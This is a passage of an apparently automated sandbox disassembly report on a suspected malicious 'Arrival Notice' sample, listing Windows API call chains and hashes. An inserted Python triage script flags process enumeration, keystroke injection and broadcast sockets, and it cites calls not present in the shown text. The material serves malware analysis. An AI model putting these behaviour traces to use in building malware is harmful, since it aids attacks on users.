                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Rect$BeepClientMessageScreenWindow
                  • String ID:
                  • API String ID: 1352109105-0
                  • Opcode ID: 0fe4543b98c47f6a1eca6ab6994ca2a391a4192e41d85bafd753ee7be7faad2d
                  • Instruction ID: 8a792bba112bdb6c4848e0dc79a6dc827676b807aa13a4bc5232f223a9dbbe6b
                  • Opcode Fuzzy Hash: 0fe4543b98c47f6a1eca6ab6994ca2a391a4192e41d85bafd753ee7be7faad2d
                  • Instruction Fuzzy Hash: 8A419C78605214DFEB11CF58C894EA977F9BF49314F5980AAE4149B361C738B943CF98
                  APIs
                  • GetForegroundWindow.USER32 ref: 004416EB
                    • Part of subcall function 00413A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00413A57
                    • Part of subcall function 00413A3D: GetCurrentThreadId.KERNEL32 ref: 00413A5E
                    • Part of subcall function 00413A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004125B3), ref: 00413A65
                  • GetCaretPos.USER32(?), ref: 004416FF
                  • ClientToScreen.USER32(00000000,?), ref: 0044174C
                  • GetForegroundWindow.USER32 ref: 00441752
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                  • String ID:
                  • API String ID: 2759813231-0
                  • Opcode ID: 616d6717b556fca2a38d5e9578cd3e5f24c11cbae65d76c5fc79b02aded729e0
                  • Instruction ID: 09da2796611196c959e246d495e628879fe723cff9981cdb64a81ca8f6237893
                  • Opcode Fuzzy Hash: 616d6717b556fca2a38d5e9578cd3e5f24c11cbae65d76c5fc79b02aded729e0
                  • Instruction Fuzzy Hash: 67316175D00109AFD701EFAAC8C1CEEB7F9EF48308B5480AAE515E7612D7359E45CBA0
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0041D501
                  • Process32FirstW.KERNEL32(00000000,?), ref: 0041D50F
                  • Process32NextW.KERNEL32(00000000,?), ref: 0041D52F
                  • CloseHandle.KERNEL32(00000000), ref: 0041D5DC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 00d025e43e396775aeca479357ec81cdc666574e1cd0c5c196f3ec23f0139357
                  • Instruction ID: 252f9441ae389f62387fc2dcf68154e7e09f231dd58e2f8fbd4a260b2a9da07b
                  • Opcode Fuzzy Hash: 00d025e43e396775aeca479357ec81cdc666574e1cd0c5c196f3ec23f0139357
                  • Instruction Fuzzy Hash: 5231A471508300AFD301EF54C881BEFBBF8EF99358F14092EF685861A1EB719985CB92
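The "APIs" lists in these function blocks are the raw material for triage, but reading them by hand across hundreds of blocks does not scale, and an import by ordinal such as `#21.WSOCK32` above hides what is actually being called. The following is an added example, not Joe Sandbox code and not code from the sample: a small parser for the `name.MODULE(args), ref: address` lines in this report format, a partial wsock32 export-ordinal table (assumed from the DLL's ordinals, under which #21 is setsockopt and `socket(2,2,17)` opens an AF_INET/SOCK_DGRAM/IPPROTO_UDP socket), and a few chain rules matching call sequences visible in the blocks above. The sample input is copied from those blocks. One caveat a practitioner needs: for an interpreter-based or packed sample (a compiled AutoIt script, for instance) these chains belong to the runtime, so a hit says what the runtime can do, not what the embedded script does; confirm against the report's behaviour sections before treating a chain as an indicator.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox disassembly report
and flag API chains worth a second look.

Added example for this page; not Joe Sandbox code and not part of the sample.
It assumes only the line layout visible in the report blocks (name.MODULE(args),
ref: address) and carries a partial, assumed ordinal table for wsock32.dll.
"""
import re
from collections import defaultdict

# One API reference line, e.g.
#   • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00431B8A
#   • Part of subcall function 00413A3D: AttachThreadInput.USER32(...), ref: 00413A65
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Partial export-ordinal table for wsock32.dll (assumed; only the entries used here).
WSOCK32_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect",
                    16: "recv", 19: "send", 21: "setsockopt", 23: "socket"}

# Winsock constants as they appear in the sandbox's zero-padded hex argument dump.
SOCKET_FAMILY = {"00000002": "AF_INET"}
SOCKET_TYPE = {"00000001": "SOCK_STREAM", "00000002": "SOCK_DGRAM"}
SOCKET_PROTO = {"00000006": "IPPROTO_TCP", "00000011": "IPPROTO_UDP"}
SOL_SOCKET, SO_BROADCAST = "0000FFFF", "00000020"

# Constructed input: API lines copied from the function blocks of the report.
SAMPLE = """\
• CreateToolhelp32Snapshot.KERNEL32 ref: 0041D501
• Process32FirstW.KERNEL32(00000000,?), ref: 0041D50F
• Process32NextW.KERNEL32(00000000,?), ref: 0041D52F
• CloseHandle.KERNEL32(00000000), ref: 0041D5DC
• socket.WSOCK32(00000002,00000002,00000011), ref: 00431AFD
• WSAGetLastError.WSOCK32 ref: 00431B0B
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00431B8A
• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0040D3BF
• FreeLibrary.KERNEL32 ref: 0040D3E5
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0041ABF1
• SetKeyboardState.USER32(00000080,?,00008000), ref: 0041AC0D
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0041ACC6
  • Part of subcall function 00413A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004125B3), ref: 00413A65
"""


def parse_api_lines(text):
    """Return one dict per API reference; wsock32 ordinal imports are resolved to names."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headers, dump sources, hashes: not an API reference
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        name = m["name"]
        if name.startswith("#") and m["module"] == "WSOCK32":
            name = WSOCK32_ORDINALS.get(int(name[1:]), name)
        calls.append({"name": name, "module": m["module"], "args": args,
                      "ref": m["ref"], "subcall_of": m["caller"]})
    return calls


def describe_socket(call):
    """Decode the (af, type, protocol) triple of a logged socket() call."""
    af, ty, proto = (call["args"] + ["?"] * 3)[:3]
    return "/".join((SOCKET_FAMILY.get(af, af), SOCKET_TYPE.get(ty, ty),
                     SOCKET_PROTO.get(proto, proto)))


def find_chains(calls):
    """Map a chain label to the call-site addresses that make it up."""
    by_name = defaultdict(list)
    for c in calls:
        by_name[c["name"]].append(c)
    present = set(by_name)
    found = {}

    def refs(*names):
        return [c["ref"] for n in names for c in by_name[n]]

    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= present:
        found["process enumeration via Toolhelp32"] = refs(
            "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW")
    wow64 = [c for c in by_name["GetProcAddress"] if "GetSystemWow64DirectoryW" in c["args"]]
    if wow64:
        found["WOW64 check via GetSystemWow64DirectoryW"] = [c["ref"] for c in wow64]
    if {"GetKeyboardState", "SetKeyboardState", "SendInput"} <= present:
        found["keystroke injection via SendInput"] = refs(
            "GetKeyboardState", "SetKeyboardState", "SendInput")
    udp = [c for c in by_name["socket"] if describe_socket(c) == "AF_INET/SOCK_DGRAM/IPPROTO_UDP"]
    bcast = [c for c in by_name["setsockopt"] if c["args"][1:3] == [SOL_SOCKET, SO_BROADCAST]]
    if udp and bcast:
        found["UDP socket with SO_BROADCAST"] = [c["ref"] for c in udp + bcast]
    return found


if __name__ == "__main__":
    for label, sites in find_chains(parse_api_lines(SAMPLE)).items():
        print(f"{label}: {', '.join(sites)}")
```

Run as-is it prints four chains with their call-site addresses; to use it on a full report, paste the text of the disassembly section into `SAMPLE` or read it from a file. The chain rules are deliberately strict (all members of a chain must be present, and the socket rule checks the actual argument values) so that a single `CloseHandle` or `GetProcAddress` does not trigger a hit on its own.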
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • GetCursorPos.USER32(?), ref: 00449001
                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00407711,?,?,?,?,?), ref: 00449016
                  • GetCursorPos.USER32(?), ref: 0044905E
                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00407711,?,?,?), ref: 00449094
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                  • String ID:
                  • API String ID: 2864067406-0
                  • Opcode ID: ed740055d1bcfceba611bd35392823a2a1f8e60855d57829a06606b86d6dd045
                  • Instruction ID: b7b641794c1a88c9fc29a96d0c22ffc796828c354600dea9d6478dd67294666c
                  • Opcode Fuzzy Hash: ed740055d1bcfceba611bd35392823a2a1f8e60855d57829a06606b86d6dd045
                  • Instruction Fuzzy Hash: AC21BF35601018FFEB25CF94C898EEF3BB9EB4A350F04406AF9058B261C7399D51EB64
                  APIs
                  • GetFileAttributesW.KERNEL32(?,0044CB68), ref: 0041D2FB
                  • GetLastError.KERNEL32 ref: 0041D30A
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0041D319
                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0044CB68), ref: 0041D376
                  Similarity
                  • API ID: CreateDirectory$AttributesErrorFileLast
                  • String ID:
                  • API String ID: 2267087916-0
                  • Opcode ID: 6ed68a454a5ac548df2663cff0fb21d9b2000f1bb8688a7d5ec4628679e60a7d
                  • Instruction ID: ca22d8af85581a154c27b5a3db66d003ed791445edd9a89f8f657ecebb1227e2
                  • Opcode Fuzzy Hash: 6ed68a454a5ac548df2663cff0fb21d9b2000f1bb8688a7d5ec4628679e60a7d
                  • Instruction Fuzzy Hash: 4121D6B49052059F8300DF24C8815EB77E4EE56318F144A5EF8A9C72A1D734D986CB9B
                  APIs
                    • Part of subcall function 00411014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0041102A
                    • Part of subcall function 00411014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00411036
                    • Part of subcall function 00411014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00411045
                    • Part of subcall function 00411014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0041104C
                    • Part of subcall function 00411014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00411062
                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004115BE
                  • _memcmp.LIBVCRUNTIME ref: 004115E1
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00411617
                  • HeapFree.KERNEL32(00000000), ref: 0041161E
                  Similarity
                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                  • String ID:
                  • API String ID: 1592001646-0
                  • Opcode ID: 174e362a498899a0311edc36c6c535038203a98a852d2251693e6bcd56b1fa95
                  • Instruction ID: 14adfe01ffac4f89ceceac6a785de6eb48ff8090573c5e3bb9fee3fad3b2b453
                  • Opcode Fuzzy Hash: 174e362a498899a0311edc36c6c535038203a98a852d2251693e6bcd56b1fa95
                  • Instruction Fuzzy Hash: 2B21CF31E01108EFDF00DFA4C944BEFB7B9EF85344F08445AE501AB261E735AA84CBA4
                  APIs
                  • GetWindowLongW.USER32(?,000000EC), ref: 0044280A
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00442824
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00442832
                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00442840
                  Similarity
                  • API ID: Window$Long$AttributesLayered
                  • String ID:
                  • API String ID: 2169480361-0
                  • Opcode ID: 6893bd6b17b70b9bde3bfe2c23af03d378c96c522da08461d59999a2354753c3
                  • Instruction ID: 052634b082dd5c7e2bffa87b4ba2b950c4bd317e115976b307fce7ceb8802bc1
                  • Opcode Fuzzy Hash: 6893bd6b17b70b9bde3bfe2c23af03d378c96c522da08461d59999a2354753c3
                  • Instruction Fuzzy Hash: B6213635205110AFE7109B24C940FAAB795AF46324F14825AF4168B6D2CBB5FC42CB94
                  APIs
                    • Part of subcall function 00418D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0041790A,?,000000FF,?,00418754,00000000,?,0000001C,?,?), ref: 00418D8C
                    • Part of subcall function 00418D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00418DB2
                    • Part of subcall function 00418D7D: lstrcmpiW.KERNEL32(00000000,?,0041790A,?,000000FF,?,00418754,00000000,?,0000001C,?,?), ref: 00418DE3
                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00418754,00000000,?,0000001C,?,?,00000000), ref: 00417923
                  • lstrcpyW.KERNEL32(00000000,?), ref: 00417949
                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00418754,00000000,?,0000001C,?,?,00000000), ref: 00417984
                  Strings
                  Similarity
                  • API ID: lstrcmpilstrcpylstrlen
                  • String ID: cdecl
                  • API String ID: 4031866154-3896280584
                  • Opcode ID: dfc0a08e721e921c8fabf0ba0b09a28aa8f12ea6015c27fd16f5e78f59efe27d
                  • Instruction ID: acfa9dc45c0465b961a17d9ffaf1c5acd717aa4b760e7e4efb004c9ca61922cb
                  • Opcode Fuzzy Hash: dfc0a08e721e921c8fabf0ba0b09a28aa8f12ea6015c27fd16f5e78f59efe27d
                  • Instruction Fuzzy Hash: ED11E47A200301ABDB159F35D844EBB77B5EF85350B10402FF906CB3A4EB359841C799
                  APIs
                  • GetWindowLongW.USER32(?,000000F0), ref: 00447D0B
                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00447D2A
                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00447D42
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0042B7AD,00000000), ref: 00447D6B
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: fb4ec7616f9ee17d5a0b0fd862ededdda92b1a0bcae0e2cf3075cc5f56ee73ad
                  • Instruction ID: 9502a619f76581275ba4b5a0a5738d3d65811a338fe4e85a7843c42d84d4f202
                  • Opcode Fuzzy Hash: fb4ec7616f9ee17d5a0b0fd862ededdda92b1a0bcae0e2cf3075cc5f56ee73ad
                  • Instruction Fuzzy Hash: 8C11D271615614AFDB109F28CC44E6A3BA9AF46360B15873AF839C72F0D7348D12CB48
                  APIs
                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 004456BB
                  • _wcslen.LIBCMT ref: 004456CD
                  • _wcslen.LIBCMT ref: 004456D8
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00445816
                  Similarity
                  • API ID: MessageSend_wcslen
                  • String ID:
                  • API String ID: 455545452-0
                  • Opcode ID: b5ee43619cffe3519101d017e9ef930069bd2b7b7f717f16a1f7be6ec4ef52c2
                  • Instruction ID: b9751d70f265d9cf5aee5b66006f917edc624abbadfa23e19d26e2d2460d0993
                  • Opcode Fuzzy Hash: b5ee43619cffe3519101d017e9ef930069bd2b7b7f717f16a1f7be6ec4ef52c2
                  • Instruction Fuzzy Hash: 3C11B475600604A7EF20EF61DC85AEF776CAF11764B104027F915DA182E778C985CB69
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 675471de18940265148d8f35b03c814d4a575560f326f45bece1cbeca49fd9dd
                  • Instruction ID: 8a21bd9586e64a3c6367a1b59faaf1cffeef4cf3329d87d3ca2f3e767a497108
                  • Opcode Fuzzy Hash: 675471de18940265148d8f35b03c814d4a575560f326f45bece1cbeca49fd9dd
                  • Instruction Fuzzy Hash: 3501A2B22056AA7EF662167A6CC1F77661CDF823B8B360729F521551D2DB718C005160
                  APIs
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00411A47
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00411A59
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00411A6F
                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00411A8A
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 2020f0f188c1cdfff2488fca5808ebd5638fe5ba450cd266578fc183b123b451
                  • Instruction ID: da57bcb0c39a388bafd6d9ea33f23ecc3550f3126298bea19df1e42e38bf2310
                  • Opcode Fuzzy Hash: 2020f0f188c1cdfff2488fca5808ebd5638fe5ba450cd266578fc183b123b451
                  • Instruction Fuzzy Hash: D211FA3A901219FFEB119BA5C985FEDBB78EF04750F200096EA04B7290D6716E51DB98
                  APIs
                  • GetCurrentThreadId.KERNEL32 ref: 0041E1FD
                  • MessageBoxW.USER32(?,?,?,?), ref: 0041E230
                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0041E246
                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0041E24D
                  Similarity
                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                  • String ID:
                  • API String ID: 2880819207-0
                  • Opcode ID: 47f3825189c9ea1c5667e46978ad20236020bd7a9490823534958dcad7d251c5
                  • Instruction ID: 9d1baa718632d7e97857ea4d91b0c8d1045588b61d85e75e7ab9eb083f584782
                  • Opcode Fuzzy Hash: 47f3825189c9ea1c5667e46978ad20236020bd7a9490823534958dcad7d251c5
                  • Instruction Fuzzy Hash: 89112B7AA04254BBD7019FA99C45ADF7FAC9B46310F14467BFC14D3391D2B4CD0087A8
                  APIs
                  • CreateThread.KERNEL32(00000000,?,003DCFF9,00000000,00000004,00000000), ref: 003DD218
                  • GetLastError.KERNEL32 ref: 003DD224
                  • __dosmaperr.LIBCMT ref: 003DD22B
                  • ResumeThread.KERNEL32(00000000), ref: 003DD249
                  Similarity
                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                  • String ID:
                  • API String ID: 173952441-0
                  • Opcode ID: f86100e9109a7c1dc44c31905c445cd205709a11e9fadcbb507bd2536619570f
                  • Instruction ID: 61147b571caebada96c2fc4b7fb175762af1469bbe444c94741d0b004273230c
                  • Opcode Fuzzy Hash: f86100e9109a7c1dc44c31905c445cd205709a11e9fadcbb507bd2536619570f
                  • Instruction Fuzzy Hash: 3801D6378051047BC7125BA5EC45BAA7A6DEF82330F11062AF925962D0CB718901C7A0
                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003B604C
                  • GetStockObject.GDI32(00000011), ref: 003B6060
                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 003B606A
                  Similarity
                  • API ID: CreateMessageObjectSendStockWindow
                  • String ID:
                  • API String ID: 3970641297-0
                  • Opcode ID: 68c8180e1a7402be1096ade1ae8859b09b5519dffa7f9063bc7122d1a5386f43
                  • Instruction ID: 29638d6087a3ae17534d30918c02bd8bf42a5ebed79f1bd5811bf6e35bb4382b
                  • Opcode Fuzzy Hash: 68c8180e1a7402be1096ade1ae8859b09b5519dffa7f9063bc7122d1a5386f43
                  • Instruction Fuzzy Hash: AE11AD72506509BFEF126FA58C85EFABB6DEF093A8F050216FB0452021D7369C60DBA0
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 003D3B56
                    • Part of subcall function 003D3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 003D3AD2
                    • Part of subcall function 003D3AA3: ___AdjustPointer.LIBCMT ref: 003D3AED
                  • _UnwindNestedFrames.LIBCMT ref: 003D3B6B
                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 003D3B7C
                  • CallCatchBlock.LIBVCRUNTIME ref: 003D3BA4
                  Similarity
                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                  • String ID:
                  • API String ID: 737400349-0
                  • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                  • Instruction ID: 41e4a5f51c487ca35437ab9abbc2382265f1fbd4bcf222199f1a363e8612fdc1
                  • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                  • Instruction Fuzzy Hash: 22012933100148BBDF125F95EC46EEB3B69FF48794F05401AFE485A221C732E961EBA1
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003B13C6,00000000,00000000,?,003E301A,003B13C6,00000000,00000000,00000000,?,003E328B,00000006,FlsSetValue), ref: 003E30A5
                  • GetLastError.KERNEL32(?,003E301A,003B13C6,00000000,00000000,00000000,?,003E328B,00000006,FlsSetValue,00452290,FlsSetValue,00000000,00000364,?,003E2E46), ref: 003E30B1
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003E301A,003B13C6,00000000,00000000,00000000,?,003E328B,00000006,FlsSetValue,00452290,FlsSetValue,00000000), ref: 003E30BF
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: fa1d66bcee84a6aa63de95b33409c228ae257449272b24009c784b2b31dffc11
                  • Instruction ID: 8a8a5d67b9c686b8ef53282c85fd65dfb15f3e18f91e82c5ac53c953344ec01f
                  • Opcode Fuzzy Hash: fa1d66bcee84a6aa63de95b33409c228ae257449272b24009c784b2b31dffc11
                  • Instruction Fuzzy Hash: 4701FC36743272ABCB328B7A9C889677798AF45761B150730F907D31D0C721DD01C6D4
                  APIs
                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0041747F
                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00417497
                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004174AC
                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004174CA
                  Similarity
                  • API ID: Type$Register$FileLoadModuleNameUser
                  • String ID:
                  • API String ID: 1352324309-0
                  • Opcode ID: 8111b6e9f28d3a874b165e38adaa58776e1b9bfdb59c32aa77c3af175eeb43f7
                  • Instruction ID: 9a439bf19d1033e49576d59771b13c3360cd04d8be62cbc390d002fca057ef9e
                  • Opcode Fuzzy Hash: 8111b6e9f28d3a874b165e38adaa58776e1b9bfdb59c32aa77c3af175eeb43f7
                  • Instruction Fuzzy Hash: DC11A1B5306310ABE7208F14DD48BD27BFCEB00B00F10856AE656D6151DB78E984DB99
                  APIs
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0041ACD3,?,00008000), ref: 0041B0C4
                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041ACD3,?,00008000), ref: 0041B0E9
                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0041ACD3,?,00008000), ref: 0041B0F3
                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0041ACD3,?,00008000), ref: 0041B126
                  Similarity
                  • API ID: CounterPerformanceQuerySleep
                  • String ID:
                  • API String ID: 2875609808-0
                  • Opcode ID: 3407d1d6c6ac7ce9d64b82cee26ff36ec9d561f51d8dd1de6e6b769ad9a89841
                  • Instruction ID: dd7a18f773df3246c5ae0bf46a42d2e7358ec3517df4d7e01ee14a81200d0fbd
                  • Opcode Fuzzy Hash: 3407d1d6c6ac7ce9d64b82cee26ff36ec9d561f51d8dd1de6e6b769ad9a89841
                  • Instruction Fuzzy Hash: 5511C430C0151CE7CF009FE4D9986EEBF78FF0A310F114096D941B2241CB345590CB99
                  APIs
                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00412DC5
                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00412DD6
                  • GetCurrentThreadId.KERNEL32 ref: 00412DDD
                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00412DE4
                  Similarity
                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                  • String ID:
                  • API String ID: 2710830443-0
                  • Opcode ID: 5fd2203c994046baaf6b1375e09a45c131685cf33a365c48c11bbfbb118db1de
                  • Instruction ID: 1c528e1f7c6665b8eeef3df7f5d374f915a074fe75b0c34113ae9e298c57c5e2
                  • Opcode Fuzzy Hash: 5fd2203c994046baaf6b1375e09a45c131685cf33a365c48c11bbfbb118db1de
                  • Instruction Fuzzy Hash: 2EE092752422287BD7601BB2EC4DFEB3E6CEF43BA1F054026F105D10809AE4C881C6B5
                  APIs
                    • Part of subcall function 003C9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C9693
                    • Part of subcall function 003C9639: SelectObject.GDI32(?,00000000), ref: 003C96A2
                    • Part of subcall function 003C9639: BeginPath.GDI32(?), ref: 003C96B9
                    • Part of subcall function 003C9639: SelectObject.GDI32(?,00000000), ref: 003C96E2
                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00448887
                  • LineTo.GDI32(?,?,?), ref: 00448894
                  • EndPath.GDI32(?), ref: 004488A4
                  • StrokePath.GDI32(?), ref: 004488B2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                  • String ID:
                  • API String ID: 1539411459-0
                  • Opcode ID: a54186c9bce0998b0be02697a6123a421f04c66a525b0df4dd7247c3fa227eda
                  • Instruction ID: 4b36283c8f84d48bdea9bdb0c23fe4879a12af866c8fb08b3601e320ddc2387b
                  • Opcode Fuzzy Hash: a54186c9bce0998b0be02697a6123a421f04c66a525b0df4dd7247c3fa227eda
                  • Instruction Fuzzy Hash: 47F05E3A042258FAEB126F94AC0EFCE3F59AF06310F088115FA11651E2C7795521CFED
                  APIs
                  • GetSysColor.USER32(00000008), ref: 003C98CC
                  • SetTextColor.GDI32(?,?), ref: 003C98D6
                  • SetBkMode.GDI32(?,00000001), ref: 003C98E9
                  • GetStockObject.GDI32(00000005), ref: 003C98F1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
